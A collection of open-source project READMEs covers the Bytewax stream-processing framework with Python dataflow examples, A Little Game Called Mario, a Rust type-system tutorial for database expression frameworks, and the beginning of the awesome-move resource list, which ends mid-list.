Bytewax is a Python framework and Rust distributed processing engine that uses a dataflow computational model to provide parallelizable stream processing and event processing capabilities similar to Flink, Spark, and Kafka Streams. You can use Bytewax for a variety of workloads, from moving data à la Kafka Connect all the way to advanced online machine learning workloads. Bytewax is not limited to streaming applications; it excels anywhere that data can be distributed at the input and output. Bytewax has an accompanying command line interface, waxctl, which supports the deployment of dataflows on cloud servers or Kubernetes. You can download it here.

Getting Started with Bytewax

```sh
pip install bytewax
```

Install waxctl

Dataflow, Input and Operators

A Bytewax dataflow is Python code that represents an input, a series of processing steps, and an output. The inputs could range from a Kafka stream to a WebSocket, and the outputs could vary from a data lake to a key-value store.

```python
import json

from bytewax import operators as op
# KafkaSinkMessage is used below when writing back out to Kafka.
from bytewax.connectors.kafka import KafkaSinkMessage, operators as kop
from bytewax.dataflow import Dataflow
```

Bytewax has input and output helpers for common data sources, but you can also create your own with the Sink and Source API. At a high level, the dataflow compute model is one in which a program execution is conceptualized as data flowing through a series of operator-based steps. Operators like map and filter are the processing primitives of Bytewax. Each of them gives you a "shape" of data transformation, and you give them regular Python functions to customize them to a specific task you need (a minimal sketch follows below).
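As a minimal illustration before the fuller Kafka example below, here is a hedged sketch of a dataflow built from the map and filter operators, using the testing source that ships with Bytewax (module and step names are arbitrary):

```python
# Sketch: keep the even numbers in a stream and square them.
# Assuming this file is saved as evens.py, run it with:
#   python -m bytewax.run evens:flow
from bytewax import operators as op
from bytewax.dataflow import Dataflow
from bytewax.testing import TestingSource

flow = Dataflow("evens_squared")
nums = op.input("inp", flow, TestingSource([1, 2, 3, 4, 5]))
evens = op.filter("keep_even", nums, lambda x: x % 2 == 0)
squared = op.map("square", evens, lambda x: x * x)
op.inspect("out", squared)  # print each item for debugging
```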
See the documentation for a list of the available operators.

```python
BROKERS = ["localhost:19092"]
IN_TOPICS = ["in_topic"]
OUT_TOPIC = "out_topic"
ERR_TOPIC = "errors"


def deserialize(kafka_message):
    return json.loads(kafka_message.value)


def anonymize_email(event_data):
    event_data["email"] = "@".join(["******", event_data["email"].split("@")[-1]])
    return event_data


def remove_bytewax(event_data):
    return "bytewax" not in event_data["email"]


flow = Dataflow("kafka_in_out")
stream = kop.input("inp", flow, brokers=BROKERS, topics=IN_TOPICS)
# We can inspect the stream coming from the Kafka topic to view the items
# within on stdout for debugging.
op.inspect("inspect-oks", stream.oks)
# We can also inspect Kafka errors as a separate stream and raise an
# exception when one is encountered.
errs = op.inspect("errors", stream.errs).then(op.raises, "crash-on-err")
deser_msgs = op.map("deserialize", stream.oks, deserialize)
anon_msgs = op.map("anon", deser_msgs, anonymize_email)
filtered_msgs = op.filter("filter_employees", anon_msgs, remove_bytewax)
processed = op.map("map", filtered_msgs, lambda m: KafkaSinkMessage(None, json.dumps(m)))
# And finally, output the cleaned data to a new topic.
kop.output("out1", processed, brokers=BROKERS, topic=OUT_TOPIC)
```

Windowing, Reducing and Aggregating

Bytewax is a stateful stream processing framework, which means that some operations remember information across multiple events. Windows and aggregations are also stateful and can be reconstructed in the event of failure. Bytewax can be configured with different state recovery mechanisms to durably persist state in order to recover from failure. There are multiple stateful operators available, like reduce, stateful_map, and fold_window. The complete list can be found in the API documentation for all operators. Below we use the collect_window operator with a tumbling window based on event time to gather events and calculate a per-user average within each window.

```python
from datetime import datetime, timedelta, timezone

from bytewax import operators as op
from bytewax.dataflow import Dataflow
import bytewax.operators.windowing as win
from bytewax.operators.windowing import EventClock, TumblingWindower
from bytewax.testing import TestingSource

flow = Dataflow("window_eg")

src = [
    {"user_id": "123", "value": 5, "time": "2023-01-01T00:00:00+00:00"},
    {"user_id": "123", "value": 7, "time": "2023-01-01T00:00:01+00:00"},
    {"user_id": "123", "value": 2, "time": "2023-01-01T00:00:07+00:00"},
]
inp = op.input("inp", flow, TestingSource(src))
keyed_inp = op.key_on("keyed_inp", inp, lambda x: x["user_id"])


# This function instructs the event clock on how to retrieve the event's
# datetime from the input. Note that the datetime MUST be UTC. If the
# datetime is using a different representation, we would have to convert
# it here.
def get_event_time(event):
    return datetime.fromisoformat(event["time"])


# Configure the clock to use the event time.
clock = EventClock(get_event_time, wait_for_system_duration=timedelta(seconds=10)) And a 5 seconds tumbling window align_to = datetime(2023, 1, 1, tzinfo=timezone.utc) windower = TumblingWindower(align_to=align_to, length=timedelta(seconds=5)) five_sec_buckets_win_out = win.collect_window( "five_sec_buckets", keyed_inp, clock, windower ) def calc_avg(bucket): values = [event["value"] for event in bucket] if len(values) > 0: return sum(values) / len(values) else: return None five_sec_avgs = op.map_value("avg_in_bucket", five_sec_buckets_win_out.down, calc_avg) ``` Merges and Joins Merging or Joining multiple input streams is a common task for stream processing, Bytewax enables different types of joins to facilitate different patters. Merging Streams Merging streams is like concatenating, there is no logic and the resulting stream will potentially include heterogeneous records. ```python from bytewax import operators as op from bytewax.connectors.stdio import StdOutSink from bytewax.dataflow import Dataflow from bytewax.testing import TestingSource flow = Dataflow("merge") src_1 = [ {"user_id": "123", "name": "Bumble"}, ] inp1 = op.input("inp1", flow, TestingSource(src_1)) src_2 = [ {"user_id": "123", "email": "bee@bytewax.com"}, {"user_id": "456", "email": "hive@bytewax.com"}, ] inp2 = op.input("inp2", flow, TestingSource(src_2)) merged_stream = op.merge("merge", inp1, inp2) op.inspect("debug", merged_stream) ``` Joining Streams Joining streams is different than merging because it uses logic to join the records in the streams together. The joins in Bytewax can be running or not. A regular join in streaming is more closely related to an inner join in SQL in that the dataflow will emit data downstream from a join when all of the sides of the join have matched on the key. ```python from bytewax import operators as op from bytewax.connectors.stdio import StdOutSink from bytewax.dataflow import Dataflow from bytewax.testing import TestingSource flow = Dataflow("join") src_1 = [ {"user_id": "123", "name": "Bumble"}, ] inp1 = op.input("inp1", flow, TestingSource(src_1)) keyed_inp_1 = op.key_on("key_stream_1", inp1, lambda x: x["user_id"]) src_2 = [ {"user_id": "123", "email": "bee@bytewax.com"}, {"user_id": "456", "email": "hive@bytewax.com"}, ] inp2 = op.input("inp2", flow, TestingSource(src_2)) keyed_inp_2 = op.key_on("key_stream_2", inp2, lambda x: x["user_id"]) merged_stream = op.join("join", keyed_inp_1, keyed_inp_2) op.inspect("debug", merged_stream) ``` Output Output in Bytewax is described as a sink and these are grouped into connectors . There are a number of basic connectors in the Bytewax repo to help you during development. In addition to the built-in connectors, it is possible to use the input and output API to build a custom sink and source. There is also a hub for connectors built by the community, partners and Bytewax. Below is an example of a custom connector for Postgres using the psycopg2 library. 
```python
import psycopg2
from psycopg2.extras import execute_values

from bytewax import operators as op
from bytewax.outputs import FixedPartitionedSink, StatefulSinkPartition


class PsqlSink(StatefulSinkPartition):
    def __init__(self):
        self.conn = psycopg2.connect("dbname=website user=bytewax")
        self.conn.set_session(autocommit=True)
        self.cur = self.conn.cursor()

    def write_batch(self, values):
        # `values` is a list of (user_id, data) tuples; `execute_values`
        # expands the single `VALUES %s` placeholder for the whole batch.
        query_string = """
            INSERT INTO events (user_id, data)
            VALUES %s
            ON CONFLICT (user_id)
            DO UPDATE SET data = EXCLUDED.data;
        """
        execute_values(self.cur, query_string, values)

    def snapshot(self):
        # Autocommit is enabled, so there is no partition state to snapshot.
        pass

    def close(self):
        self.conn.close()


class PsqlOutput(FixedPartitionedSink):
    def list_parts(self):
        return ["single"]

    def build_part(self, step_id, for_part, resume_state):
        return PsqlSink()
```

Execution

Bytewax dataflows can be executed in a single Python process, or on multiple processes on multiple hosts with multiple worker threads. When processing data in a distributed fashion, Bytewax uses routing keys to ensure your state is updated correctly and automatically.

```sh
# Run a single worker locally.
python -m bytewax.run my_dataflow:flow

# Start two worker threads in a single process.
python -m bytewax.run my_dataflow -w 2

# Start a process on two separate machines to form a Bytewax cluster.
# Start the first process with two worker threads on `machine_one`.
machine_one$ python -m bytewax.run my_dataflow -w 2 -i0 -a "machine_one:2101;machine_two:2101"

# Then start the second process with three worker threads on `machine_two`.
machine_two$ python -m bytewax.run my_dataflow -w 3 -i1 -a "machine_one:2101;machine_two:2101"
```

It can also be run in a Docker container as described further in the documentation.

Kubernetes

The recommended way to run dataflows at scale is to leverage the kubernetes ecosystem. To help manage deployment, we built waxctl, which allows you to easily deploy dataflows that will run at huge scale across multiple compute nodes.

```sh
waxctl df deploy my_dataflow.py --name my-dataflow
```

Why Bytewax?

At a high level, Bytewax provides a few major benefits:

- The operators in Bytewax are largely “data-parallel”, meaning they can operate on independent parts of the data concurrently.
- Bytewax offers the ability to express higher-level control constructs, like iteration.
- Bytewax allows you to develop and run your code locally, and then easily scale that code to multiple workers or processes without changes.
- Bytewax can be used in both a streaming and batch context.
- Ability to leverage the Python ecosystem directly.

Community

Slack is the main forum for communication and discussion. GitHub Issues is reserved only for actual issues. Please use the community Slack for discussions. Code of Conduct

More Examples

For a more complete example, and documentation on the available operators, check out the User Guide and the /examples folder.

License

Bytewax is licensed under the Apache-2.0 license.

Contributing

Contributions are welcome! This community and project would not be what it is without the contributors. All contributions, from bug reports to new features, are welcome and encouraged. Please view the Contribution Guide for how to get started.

With ❤️ Bytewax;Python Stream Processing;python,stream-processing,rust,data-engineering,data-processing,data-science,dataflow,machine-learning,streaming-data
bytewax/bytewax
a-little-org-called-mario/a-little-game-called-mario;A Little Game Called Mario

open source collective hell game. a bad idea from the mind of izzy kestrel, inspired by Aaron San Filippo.

🎮 play the latest version here 🎮

🗣 join the discord server (by joining our discord you are agreeing to abide by our code of conduct) 🗣

about

this is (at least to start) a simple 2D platformer game made with Godot Engine. it exists for all to enjoy - not only as players, but also as Game Developers. finally, we can put the discourse to rest. are you a Game Developer? no? why not? all you have to do is make some changes to this project. it's that simple. will you add some art? some music? some new gameplay mechanics? dialog? robust multiplayer functionality with rollback netcode? it's up to you.

your contributions are valuable regardless of how experienced you are or where your strengths lie. even if you never touch a line of code, you're still valuable as a player who can spot things that are wrong and report them for others to fix. i would even go so far as to say you're still a Game Developer by simply playtesting and providing QA support - games wouldn't exist without those people!

this is a game that will live or die by its ability to capture a collective imagination, and i like to believe that people can do some pretty amazing things when they organize together under a common goal. so the next time someone asks, "oh, you're a game developer?" you can proudly say: "yes. i worked on A Little Game Called Mario. heard of it?"

rules

be kind, respectful, and have empathy for your players and fellow developers. this means:

- adding content that improves the player's experience
- adding comments/tools/utilities that make it easier for less experienced developers to contribute
- removing content that is racist, homophobic, transphobic, ableist, or any number of other things that diminish the work and make it less accessible to anyone who might want to play or contribute to it

your contributions should be additive whenever possible. this is not your game, it is everyone's game. if you believe changing/removing existing features could improve the game, that's great! but please try to get in touch with the people who originally made those choices and see if you can collaborate rather than disregard their hard work. assume their contributions were made with just as much intentionality as yours and should be just as valued.

don't be shy about talking to new people, be it to collaborate or just to ask for help! you're all here for the same reason: to make a game. the whole point is collaboration and making new friends. please read through our code of conduct!

contributing

there are many ways to contribute to the project! games are complex things with a lot of moving parts that only exist because of collaboration between creative and technical disciplines. here are just a few ways you might be able to help out:

🎨 if you're the creative type 🎨

make something! anything! it doesn't need to be perfect or polished and it certainly doesn't have to be hooked up via code right away! leave a little gift for the more technical/design-minded folks - their eyes will light up as they think of a dozen different ways it could be implemented as a weird new power-up or something. learn more about submitting assets

⚙️ if you're the technical type ⚙️

see if there are any open issues to work on! these can range from bug reports to feature requests, and some of them may even be tagged as a "good first issue" for new folks.
you can also dig around in closed issues and check out what people are actively working on in pull requests. learn more about making code changes 🤔 don't forget the designer types! 🤔 i think these folks get a bad rap (not just saying that bc i'm one of them!!) - design is important and even tho you can't throw a rock without hitting someone with a "good game idea", what you may not appreciate is how hard it actually can be to execute on! and i'm not talking about learning to code or create art to support your vision....we have plenty of folks here who are already experts at those things! but at the same time, those same folks may not think about problems in the same creative way that you do. check out the discussions and issues to see if there are any conversations you might be able to contribute to and don't forget to join our discord to see what other folks are talking about! 🎮 about the game engine 🎮 Godot Engine is a free and open-source tool for making video games. Check out this video for a very quick primer: The Godot Game Engine Explained in 5 Minutes you can download Godot here: - Windows - Mac OS X - Linux this project was created with v3.4.4 - if you have an older version installed, we recommend upgrading to avoid compatibility issues during development Godot is relatively easy to learn but can be fairly powerful. the documentation is very good and includes some helpful resources: - Getting Started - Your First 2D Game - Tutorials and resources if videos are more your thing, i recommend these channels: - GDQuest - Godot Tutorials this video was used as reference to create the framework for this project: Make your first 2D platformer game IN JUST 10 MINUTES this is all rad but i'm still intimidated 😱 i could go on for hours about impostor syndrome and all that junk (stuff i feel, just the same as you!!) but some ppl need more encouragement than others so i won't attempt a one-size fits all spiel here 😉 but if you have questions/feedback/concerns/ideas/whatev PLEASE don't hesitate to ask for help on our discord server !! with that, i relinquish all creative control of this beautiful beast. godspeed, Little Mario. make mommy proud 💖;open source collective hell game;game,game-development,gamedev,godot
a-little-org-called-mario/a-little-game-called-mario
skyzh/type-exercise-in-rust;Type Exercise in Rust

This is a short lecture on how to use the Rust type system to build necessary components in a database system. The lecture revolves around how Rust programmers (like me) build database systems in the Rust programming language. We leverage the Rust type system to minimize runtime cost and make our development process easier with safe, nightly Rust.

In this tutorial, you will learn:

- How to build an Arrow-like library with strong compile-time types. (Day 1 - 3)
- How to use declarative macros to implement dispatch functions on a non-object-safe trait. (Day 4)
- How to use GAT (generic associated types) and how to vectorize any scalar function with a GAT generic parameter. (Day 5 - 6)
  - ... how to by-pass compiler bugs on GAT lifetimes in the Fn trait.
  - ... how to manually implement covariance on a GAT lifetime.
  - ... how to correctly add trait bounds for GAT.
- How to use declarative macros to associate things together. (Day 7)

Community

You may join skyzh's Discord server and study with the type-exercise community.

See Also...

- RisingLight - RisingLight is an OLAP database system for educational purposes. Most of the techniques described in this lecture have already been implemented in our educational database system “RisingLight”.
- Databend - Databend's expression evaluation implementation is greatly influenced by type-exercise. You may see the implementation in the datavalues crate.
- RisingWave - RisingWave is a cloud-native streaming database product. It is the first time that I experimented with GAT-related things in RisingWave to auto-vectorize expressions. It applies almost the same techniques as described in this lecture.
- TiKV Coprocessor - I worked on TiKV two years ago on its expression evaluation framework. At the time of building the TiKV coprocessor, there was no GAT. The TiKV coprocessor is an example of using procedural macros to unify the behavior of different types of arrays, which is a totally different approach from this tutorial (but maybe in a more understandable manner). You may also take a look!

Related Issues in Rust Compiler

During writing this tutorial, I found several confusing compile errors from the compiler. If all of them had been solved on the Rust side, we could have written GAT programs more easily!

- https://github.com/rust-lang/rust/issues/93342
- https://github.com/rust-lang/rust/issues/93340

Deep Dive Type Exercise Series (in Chinese)

On My Blog: Part 0 - Part 2, Part 3 - Part 6, Part 7

On Zhihu: Part 0: Intro; Part 1: Array and ArrayBuilder; Part 2: Scalar and ScalarRef; Part 3, 4: TryFrom and Macro Expansion; Part 5, 6: Bypassing GAT Compile Errors (or Compiler Bugs?); Part 7: Associate Logical Types with Physical Types

Day 1: Array and ArrayBuilder

ArrayBuilder and Array are reciprocal traits. An ArrayBuilder creates an Array, and we can create a new ArrayBuilder from an existing Array. In day 1, we implement arrays for primitive types (like i32, f32) and for variable-length types (like String). We use associated types in traits to deduce the right type in generic functions and use GAT to unify the Array interfaces for both fixed-length and variable-length types. This framework is also very similar to libraries like Apache Arrow, but with much stronger type constraints and much lower runtime overhead.

The special thing is that we use a blanket implementation for i32 and f32 arrays -- PrimitiveArray<T>.
This would make our journey much more challenging, as we need to carefully evaluate the trait bounds needed for them in the following days.

Goals

Developers can create generic functions over all types of arrays -- no matter fixed-length primitive arrays like I32Array, or variable-length arrays like StringArray.

Without our Array trait, developers might have to implement...

```rust
fn build_i32_array_from_vec(items: &[Option<i32>]) -> Vec<i32> { /* .. */ }
fn build_str_array_from_vec(items: &[Option<&str>]) -> Vec<String> { /* .. */ }
```

Note that the functions take different parameters -- one i32 without lifetime, one &str. Our Array trait can unify their behavior:

```rust
fn build_array_from_vec<A: Array>(items: &[Option<A::RefItem<'_>>]) -> A {
    let mut builder = A::Builder::with_capacity(items.len());
    for item in items {
        builder.push(*item);
    }
    builder.finish()
}

#[test]
fn test_build_int32_array() {
    let data = vec![Some(1), Some(2), Some(3), None, Some(5)];
    let array = build_array_from_vec::<I32Array>(&data[..]);
}

#[test]
fn test_build_string_array() {
    let data = vec![Some("1"), Some("2"), Some("3"), None, Some("5"), Some("")];
    let array = build_array_from_vec::<StringArray>(&data[..]);
}
```

Also, we will be able to implement an ArrayIterator for all types of Arrays.

Day 2: Scalar and ScalarRef

Scalar and ScalarRef are reciprocal types. We can get a reference ScalarRef of a Scalar, and convert a ScalarRef back to a Scalar. By adding these two traits, we can write more generic functions with zero runtime overhead on type matching and conversion. Meanwhile, we associate Scalar with Array, so as to write functions more easily.

Goals

Without our Scalar implementation, there could be problems:

```rust
fn build_array_repeated_owned<A: Array>(item: A::OwnedItem, len: usize) -> A {
    let mut builder = A::Builder::with_capacity(len);
    for _ in 0..len {
        builder.push(Some(item /* How to convert `item` to `RefItem`? */));
    }
    builder.finish()
}
```

With the Scalar trait and corresponding implementations,

```rust
fn build_array_repeated_owned<A: Array>(item: A::OwnedItem, len: usize) -> A {
    let mut builder = A::Builder::with_capacity(len);
    for _ in 0..len {
        builder.push(Some(item.as_scalar_ref())); // Now we have `as_scalar_ref` on `Scalar`!
    }
    builder.finish()
}
```

Day 3: ArrayImpl, ArrayBuilderImpl, ScalarImpl and ScalarRefImpl

It could be possible that some information is not available until runtime. Therefore, we use XXXImpl enums to cover all variants of a single type. At the same time, we also add TryFrom<ArrayImpl> and Into<ArrayImpl> bounds for Array.

Goals

This is hard -- imagine we simply require TryFrom<ArrayImpl> and Into<ArrayImpl> bounds on Array:

```rust
pub trait Array: Send + Sync + Sized + 'static + TryFrom<ArrayImpl> + Into<ArrayImpl>
```

The compiler will complain:

```
43 | impl<T> Array for PrimitiveArray<T>
   |         ^^^^^ the trait `From<PrimitiveArray<T>>` is not implemented for `array::ArrayImpl`
   |
   = note: required because of the requirements on the impl of `Into<array::ArrayImpl>` for `PrimitiveArray<T>`
```

This is because we use a blanket implementation for PrimitiveArray to cover all primitive types. In day 3, we learn how to correctly add bounds to PrimitiveArray.

Day 4: More Types and Methods with Macro

ArrayImpl should support common functions in traits, but the Array trait doesn't have a unified interface for all types -- I32Array accepts get(&self, idx: usize) -> Option<i32> while StringArray accepts get(&self, idx: usize) -> &str. We need a get(&self, idx: usize) -> ScalarRefImpl<'_> on ArrayImpl. Therefore, we have to write the match arms to dispatch the methods.
Also, we have written so much boilerplate code for From and TryFrom. We need to eliminate such duplicated code. As we add more and more data types, we need to write the same code multiple times within a match arm. In day 4, we use declarative macros (instead of procedural macros or other kinds of code generators) to generate such code and avoid writing boilerplate code.

Goals

Before that, we need to implement every TryFrom or Scalar by ourselves:

```rust
impl<'a> ScalarRef<'a> for i32 {
    type ArrayType = I32Array;
    type ScalarType = i32;

    fn to_owned_scalar(&self) -> i32 {
        *self
    }
}

// repeat the same code for i64, f64, ...
```

```rust
impl ArrayImpl {
    /// Get the value at the given index.
    pub fn get(&self, idx: usize) -> Option<ScalarRefImpl<'_>> {
        match self {
            Self::Int32(array) => array.get(idx).map(ScalarRefImpl::Int32),
            Self::Float64(array) => array.get(idx).map(ScalarRefImpl::Float64),
            // ...
            // repeat the types for every function we added on `Array`
        }
    }
}
```

With macros, we can easily add more and more types. In day 4, we will support:

```rust
pub enum ArrayImpl {
    Int16(I16Array),
    Int32(I32Array),
    Int64(I64Array),
    Float32(F32Array),
    Float64(F64Array),
    Bool(BoolArray),
    String(StringArray),
}
```

With little code changed and the boilerplate code eliminated.

Day 5: Binary Expressions

Now that we have Array, ArrayBuilder, Scalar and ScalarRef, we can convert every function we wrote to a vectorized one using generics.

Goals

Developers will only need to implement:

```rust
pub fn str_contains(i1: &str, i2: &str) -> bool {
    i1.contains(i2)
}
```

And they can create a BinaryExpression around this function with any type:

```rust
// Vectorize `str_contains` to accept an array instead of a single value.
let expr = BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(str_contains);
// We only need to pass `ArrayImpl` to the expression, and it will do everything for us,
// including type checks, looping, etc.
let result = expr
    .eval(
        &StringArray::from_slice(&[Some("000"), Some("111"), None]).into(),
        &StringArray::from_slice(&[Some("0"), Some("0"), None]).into(),
    )
    .unwrap();
```

Developers can even create a BinaryExpression around generic functions:

```rust
pub fn cmp_le<'a, I1: Array, I2: Array, C: Array + 'static>(
    i1: I1::RefItem<'a>,
    i2: I2::RefItem<'a>,
) -> bool
where
    I1::RefItem<'a>: Into<C::RefItem<'a>>,
    I2::RefItem<'a>: Into<C::RefItem<'a>>,
    C::RefItem<'a>: PartialOrd,
{
    i1.into().partial_cmp(&i2.into()).unwrap() == Ordering::Less
}
```

```rust
// Vectorize `cmp_le` to accept an array instead of a single value.
// Here we compare an I32Array with an I64Array by casting both sides to i64.
let expr = BinaryExpression::<I32Array, I64Array, BoolArray, _>::new(
    cmp_le::<I32Array, I64Array, I64Array>,
);
let result: ArrayImpl = expr.eval(ArrayImpl, ArrayImpl).unwrap();

// `cmp_le` can also be used on `&str`.
let expr = BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(
    cmp_le::<StringArray, StringArray, StringArray>,
);
let result: ArrayImpl = expr.eval(ArrayImpl, ArrayImpl).unwrap();
```

Day 6: Erase Expression Lifetime

Vectorization looks fancy in the implementation in day 5, but there is a critical flaw -- BinaryExpression can only process &'a ArrayImpl instead of references of any lifetime:

```rust
impl<'a, I1: Array, I2: Array, O: Array, F> BinaryExpression<I1, I2, O, F> {
    pub fn eval(&self, i1: &'a ArrayImpl, i2: &'a ArrayImpl) -> Result<ArrayImpl> {
        // ...
    }
}
```

In day 6, we erase the expression lifetime by defining a BinaryExprFunc trait and implementing it for all expression functions. The BinaryExpression will be implemented as follows:

```rust
impl<I1: Array, I2: Array, O: Array, F> BinaryExpression<I1, I2, O, F> {
    pub fn eval(&self, i1: &ArrayImpl, i2: &ArrayImpl) -> Result<ArrayImpl> {
        // ...
    }
}
```

And there will be an Expression trait which can be made into a trait object:

```rust
pub trait Expression {
    /// Evaluate an expression with a run-time number of [`ArrayImpl`]s.
    fn eval_expr(&self, data: &[&ArrayImpl]) -> Result<ArrayImpl>;
}
```

In this day, we have two solutions -- the hard way and the easy way.

Goals -- The Easy Way

If we make each scalar function into a struct, things will be a lot easier. Developers will now implement scalar functions as follows:

```rust
pub struct ExprStrContains;

impl BinaryExprFunc for ExprStrContains {
    fn eval(&self, i1: &str, i2: &str) -> bool {
        i1.contains(i2)
    }
}
```

And now we can have an expression trait over all expressions, with all types and lifetimes erased:

```rust
pub trait Expression {
    /// Evaluate an expression with a run-time number of [`ArrayImpl`]s.
    fn eval_expr(&self, data: &[&ArrayImpl]) -> Result<ArrayImpl>;
}
```

Expression can be made into a Box<dyn Expression>, and can therefore be used for building expressions at runtime.

~~Goals -- The Hard Way~~

As rust-lang/rust #90087 lands, the compiler bugs have been fixed, so we don't need to do any extra work for this day to support function expressions. All BinaryExprFunc can be replaced with F: Fn(I1::RefType<'_>, I2::RefType<'_>) -> O.

In the hard way chapter, we will dive into the black magics and fight against (probably) compiler bugs, so as to make function vectorization look very approachable to SQL function developers. To begin with, we will change the signature of BinaryExpression to take Scalar as parameters:

```rust
pub struct BinaryExpression<I1: Scalar, I2: Scalar, O: Scalar, F> {
    func: F,
    _phantom: PhantomData<(I1, I2, O)>,
}
```

Then we will do a lot of black magic on the Scalar type, so as to convert freely between Array::RefItem and Scalar::RefType. This will help us bypass most of the issues in GAT, and yields the following vectorization code:

```rust
builder.push(Some(O::cast_s_to_a(
    self.func
        .eval(I1::cast_a_to_s(i1), I2::cast_a_to_s(i2))
        .as_scalar_ref(),
)))
```

We will construct a bridge trait BinaryExprFunc between plain functions and the ones that can be used by BinaryExpression. And finally developers can simply write a function and supply it to BinaryExpression:

```rust
let expr = BinaryExpression::<String, String, bool, _>::new(str_contains);
```

... or even with lambda functions:

```rust
let expr = BinaryExpression::<String, String, bool, _>::new(|x1: &str, x2: &str| x1.contains(x2));
```

Day 7: Physical Data Type and Logical Data Type

i32 and i64 are simply physical types -- how types are stored in memory (or on disk). But in a database system, we also have logical types (like Char and Varchar). In day 7, we learn how to associate logical types with physical types using macros.

Goals

Going back to our build_binary_expression function,

```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
    f: ExpressionFunc,
) -> Box<dyn Expression> {
    match f {
        CmpLe => Box::new(BinaryExpression::<I32Array, I32Array, BoolArray, _>::new(
            ExprCmpLe::<_, _, I32Array>(PhantomData),
        )),
        /* ... */
```

Currently, we only support i32 < i32 for the CmpLe expression. We should be able to support cross-type comparison here:

```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
    f: ExpressionFunc,
    i1: DataType,
    i2: DataType,
) -> Box<dyn Expression> {
    match f {
        CmpLe => match (i1, i2) {
            (SmallInt, SmallInt) => /* I16Array, I16Array */,
            (SmallInt, Real) => /* I16Array, Float32, cast to Float64 before comparison */,
            /* ... */
        }
        /* ... */
```

We have so many combinations of cross-type comparison that we couldn't write them all by hand. In day 7, we use macros to associate logical data types with Array traits, and reduce the complexity of writing such functions.

Goals -- The Easy Way

```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
    f: ExpressionFunc,
    i1: DataType,
    i2: DataType,
) -> Box<dyn Expression> {
    use ExpressionFunc::*;

    use crate::array::*;
    use crate::expr::cmp::*;
    use crate::expr::string::*;

    match f {
        CmpLe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpLe },
        CmpGe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpGe },
        CmpEq => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpEq },
        CmpNe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpNe },
        StrContains => Box::new(
            BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(ExprStrContains),
        ),
    }
}
```

Goals -- The Hard Way

```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
    f: ExpressionFunc,
    i1: DataType,
    i2: DataType,
) -> Box<dyn Expression> {
    use ExpressionFunc::*;

    use crate::expr::cmp::*;
    use crate::expr::string::*;

    match f {
        CmpLe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_le },
        CmpGe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_ge },
        CmpEq => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_eq },
        CmpNe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_ne },
        StrContains => Box::new(BinaryExpression::<String, String, bool, _>::new(
            str_contains,
        )),
    }
}
```

The goal is to write as little code as possible to generate all combinations of comparison.

Day 8: List Type

In Apache Arrow, we have ListArray, which is equivalent to Vec<Option<Vec<Option<T>>>>. We implement this in day 8.

```rust
let mut builder = ListArrayBuilder::with_capacity(0);
builder.push(Some((&/* Some ArrayImpl */).into()));
builder.push(Some((&/* Some ArrayImpl */).into()));
builder.push(None);
builder.finish();
```

Day 9: Boxed Array

Use Box<dyn Array> instead of the ArrayImpl enum. To make as few modifications as possible to the current codebase, we add two traits:

- PhysicalTypeOf: gets the physical type out of an Array.
- DynArray: the object-safe trait for Array.

Then, we can have pub struct BoxedArray(Box<dyn DynArray>); for dynamic dispatch.

Day 10: Expression Framework

Now that we have more and more expression kinds, we need an expression framework to unify them -- including unary, binary and expressions with more inputs. At the same time, we will also experiment with return value optimizations for variable-size types.

TBD Lectures

Day 11: Aggregators

Aggregators are another kind of expression. We learn how to implement them easily with our type system in day 11.;Learn Rust black magics by implementing an expression framework in database systems;rust,database,type,tutorial
skyzh/type-exercise-in-rust
MystenLabs/awesome-move;Awesome Move A curated list of code and content from the Move programming language community. Move is a programming language for writing safe smart contracts originally developed at Facebook to power the Libra blockchain. Move is designed to be a platform-agnostic language to enable common libraries, tooling, and developer communities across diverse blockchains with vastly different data and execution models. Move's ambition is to become the "JavaScript of web3" in terms of ubiquity--when developers want to quickly write safe code involving assets, it should be written in Move. Contents Overview Move-Powered Blockchains Books Tutorials Community Code Fungible Tokens Non-Fungible Tokens Decentralized Identity DeFi SocialFi On-Chain Governance Cross-Chain Bridge Accounts Frameworks Libraries Miscellaneous Tools IDEs Package Managers Wallets SDKs Papers Language Design Static Analysis and Verification Videos Slides Podcasts Blog Posts Security Overview Installation Problem Statement Move-Powered Blockchains Sui - A next-generation smart contract platform with high throughput, low latency, and an asset-oriented programming model powered by the Move programming language (in devnet ). 0L - A reference implementation of a neutral replicated state machine. Forked from the Libra/Diem technologies (in mainnet ). Starcoin - A smart contract blockchain network that scales by layering (in mainnet ). Aptos - Aptos-core strives towards being the safest and most scalable layer one blockchain solution (in mainnet ). Pontem - Substrate based parachain with MoveVM onboard (in testnet ). Celo - Blockchain with EVM and MoveVM ( coming soon ). Diem - The original Move-based blockchain from Meta (formerly Libra by Facebook) (discontinued). ChainX - Bitcoin's layer2 smart contract network, which already supports WASM and EVM and is adding MoveVM support (in mainnet ). Books Move Book - Move book maintained by the Move core team ( 中文 ). Move Book - Move book maintained by @damirka ( 中文 ). Move Patterns - A book on Move software design patterns maintained by @villesundell . Sui Move by Example - A book on the Sui Move variant maintained by @MystenLabs . Tutorials Implementing, testing, and verifying a fungible token - Maintained by the Move core team. Programming with objects - Maintained by the Sui team. Move and SmartContract Development - Maintained by the Starcoin team. Move Language - Interactive Move language course, free for everyone, maintained by imcoding.online ( 中文 ). Community Move Language Discord Move @ Sui by Mysten Labs Discord Move @ 0L Discord Move @ Starcoin Discord Move @ Aptos Discord MoveChina - The largest Chinese community for the Move programming language. Code Code written in Move. Fungible Tokens Fungible token examples - Multiple example token implementations from Sui. BasicCoin - A toy implementation of an ERC20-like fungible token. Diem - An ERC20-like token with permissioned minting/burning, see also this spec . Deployed on 0L. Token - Another ERC20-like token. Deployed on Starcoin. GAS - A token that instantiates the Diem standard above. Deployed on 0L. STC - A token that instantiates the Starcoin standard above. 